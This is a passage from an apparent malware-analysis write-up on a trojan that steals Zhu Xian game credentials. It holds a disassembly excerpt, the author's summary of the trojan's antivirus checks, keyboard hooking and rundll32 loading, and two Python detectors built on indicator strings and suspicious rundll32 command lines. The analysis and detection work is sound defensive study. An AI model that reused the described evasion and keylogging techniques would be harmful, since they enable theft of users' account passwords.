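    r'CommandLine="C:\WINDOWS\system32\rundll32.exe C:\DOCUME~1\user\LOCALS~1\Temp\z28z.dll,InstallService C:\DOCUME~1\user\Desktop\virus.exe"',
    r'ParentImage=C:\WINDOWS\explorer.exe Image="C:\Program Files\Game\patcher.exe" CommandLine="patcher.exe"',
    r'ParentImage=C:\WINDOWS\explorer.exe Image=C:\WINDOWS\system32\rundll32.exe '
    r'CommandLine="rundll32.exe C:\DOCUME~1\user\LOCALS~1\Temp\setup.dll,Install"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')          # key="quoted" or key=bare
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(?P<dll>\S+?\.dll),(?P<export>\w+)", re.I)
# Directory fragments a user can write to; system DLLs never live there.
USER_WRITABLE = ("\\temp\\", "\\tmp\\", "\\docume~1\\", "\\documents and settings\\",
                 "\\users\\", "\\appdata\\")
# DLL/export pair taken from the wsprintfA arguments in the listing above.
SAMPLE_PAIRS = {("z28z.dll", "installservice")}


def parse_event(line):
    return {k: (q or u) for k, q, u in FIELD_RE.findall(line)}


def classify_rundll32(event):
    """Reasons the event looks like the loader above; None if it is not a rundll32 launch."""
    m = RUNDLL_RE.search(event.get("CommandLine", ""))
    if not m:
        return None
    dll = PureWindowsPath(m.group("dll"))
    reasons = []
    if any(d in str(dll).lower() for d in USER_WRITABLE):
        reasons.append("DLL loaded from a user-writable directory")
    if PureWindowsPath(event.get("ParentImage", "")).name.lower() == "cmd.exe":
        reasons.append("rundll32 spawned through a cmd /c wrapper")
    if (dll.name.lower(), m.group("export").lower()) in SAMPLE_PAIRS:
        reasons.append("DLL/export pair matches the analysed sample")
    return reasons


def scan(lines):
    """Return one alert per rundll32 launch that triggered at least one reason."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify_rundll32(ev)
        if reasons:
            alerts.append({"image": ev.get("Image"),
                           "command": ev.get("CommandLine"),
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["command"])
        for r in alert["reasons"]:
            print("   -", r)
```

The first event (Control Panel launched through shell32.dll) produces no reasons and is dropped, the loader from this sample collects all three, and the last event, a DLL run from the temp folder by explorer, collects only the weak reason; in practice the number of reasons is what you would map to alert severity.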
004013E0 51 push ecx
004013E1 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
004013E5 8B5424 08 mov edx,dword ptr ss:[esp+8]
004013E9 8D4424 0C lea eax,dword ptr ss:[esp+C]
004013ED C74424 00 00040>mov dword ptr ss:[esp],400
004013F5 50 push eax
004013F6 68 19000200 push 20019
004013FB 6A 00 push 0
004013FD 51 push ecx
004013FE 52 push edx
004013FF FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA
00401405 85C0 test eax,eax
00401407 75 3F jnz short virus.00401448
00401409 56 push esi
0040140A 8B7424 14 mov esi,dword ptr ss:[esp+14]
0040140E 68 98354000 push virus.00403598
00401413 56 push esi
00401414 FF15 64204000 call dword ptr ds:[402064] ; kernel32.lstrcmpiA
0040141A 8B4C24 18 mov ecx,dword ptr ss:[esp+18]
0040141E 85C0 test eax,eax
00401420 8D4424 04 lea eax,dword ptr ss:[esp+4]
00401424 50 push eax
00401425 51 push ecx
00401426 6A 00 push 0
00401428 6A 00 push 0
0040142A 75 04 jnz short virus.00401430
0040142C 6A 00 push 0
0040142E EB 01 jmp short virus.00401431
00401430 56 push esi
00401431 8B5424 24 mov edx,dword ptr ss:[esp+24]
00401435 52 push edx
00401436 FF15 00204000 call dword ptr ds:[402000] ; advapi32.RegQueryValueExA
0040143C 8B4424 10 mov eax,dword ptr ss:[esp+10]
00401440 50 push eax
00401441 FF15 08204000 call dword ptr ds:[402008] ; advapi32.RegCloseKey
00401447 5E pop esi
00401448 59 pop ecx
00401449 C3 retn
and I found the string "zhuxian"; it should be a credential-stealing trojan for a game called Zhu Xian...
Now, to sum up the main activities of this trojan:
First it opens the registry and looks for the ZPWUpdatePack\DefaultIcon key. If that is not found, it goes to Software\Microsoft\Windows\ShellNoRoam\MUICache and enumerates its values in a loop looking for ElementClient.exe. If that is absent too, it creates a mutex, then checks whether the Kaspersky and Rising antivirus products are present, and then writes a randomly named dll file into the temp folder, which is used to hook keyboard messages and capture the account and password.
If the game is present, it should write a z28z.dll file into the temp directory and load it via rundll32.exe! (It probably also writes a ksuser.dll file; I didn't get to analyze that, I just saw it while paging through the code, sorry.)
Well, analyzing trojans really is hard work; so tired...
As for the video, I'll make it tomorrow; mum is telling me to go to bed...
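The summary above lists a handful of fixed artifacts (the mutex name, the z28.dll/z28z.dll names, the hdllpath string, the zhko/zhkf exports, the ZPWUpdatePack\DefaultIcon key, the AV process names, the cmd /c format string). The scanner below is added here as an illustration and is not code from the original post: it scores a file image or memory dump against those indicators, weighting the sample-specific strings higher than strings that also occur in legitimate software, and it declines to give a verdict on a UPX-packed image, since, as the post notes, the strings only become visible after unpacking. The byte blobs are constructed, and the weights and threshold are my own choices.

```python
# Indicator strings taken from the analysis above. Weights are my own choice:
# artifacts specific to this sample score high, strings that also occur in
# legitimate software (AV process names, the MUICache path) score low.
SPECIFIC = {
    b"czxasdfgh": 3,                    # mutex name
    b"z28z.dll": 3,                     # DLL handed to rundll32
    b"z28.dll": 3,                      # DLL appended to the random temp name
    b"hdllpath": 3,
    b"zpwupdatepack\\defaulticon": 3,   # registry key checked first
    b"zhko": 2,                         # exports resolved with GetProcAddress
    b"zhkf": 2,
}
GENERIC = {
    b"shellnoroam\\muicache": 1,
    b"avp.exe": 1,
    b"ravmond.exe": 1,
    b"installservice": 1,
    b"elementclient.exe": 1,
    b"zhuxian": 1,
    b"cmd /c %s %s,%s %s": 2,
}
THRESHOLD = 6        # minimum weighted score for a match
MIN_SPECIFIC = 2     # and at least this many sample-specific hits
UPX_SECTIONS = (b"UPX0", b"UPX1")   # section names a stock UPX build leaves behind


def scan_bytes(data):
    """Score a file image (or memory dump) against the indicators above."""
    low = data.lower()                  # indicators are matched case-insensitively
    hits = {}
    for table in (SPECIFIC, GENERIC):
        for needle, weight in table.items():
            if needle in low:
                hits[needle.decode()] = weight
    specific_hits = sum(1 for n in hits if n.encode() in SPECIFIC)
    score = sum(hits.values())
    packed = all(s in data for s in UPX_SECTIONS)   # section names are case-sensitive
    if packed and score < THRESHOLD:
        verdict = "needs unpacking"     # strings live in the compressed section
    elif score >= THRESHOLD and specific_hits >= MIN_SPECIFIC:
        verdict = "match"
    else:
        verdict = "no match"
    return {"score": score, "specific_hits": specific_hits,
            "hits": sorted(hits), "packed": packed, "verdict": verdict}


# Constructed byte blobs standing in for file images; not real samples.
PACKED_IMAGE = (b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
                + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00" + b"\x8f\x12\xa5" * 40)
UNPACKED_IMAGE = (b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00.text\x00\x00\x00"
                  + b"czxasdfgh\x00avp.exe\x00RavMonD.exe\x00hdllpath\x00z28z.dll\x00"
                  + b"ZPWUpdatePack\\DefaultIcon\x00cmd /c %s %s,%s %s\x00")
BENIGN_IMAGE = (b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
                + b"Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache\x00"
                + b"avp.exe\x00RavMonD.exe\x00InstallService\x00")

if __name__ == "__main__":
    for name, blob in (("packed", PACKED_IMAGE), ("unpacked", UNPACKED_IMAGE),
                       ("benign", BENIGN_IMAGE)):
        print(name, scan_bytes(blob))
```

The benign blob deliberately carries the MUICache path, both AV process names and the export name InstallService, all of which a legitimate installer or security tool might contain, and still scores only 4 with no sample-specific hit; the two-tier threshold is what keeps such files from being flagged on generic strings alone.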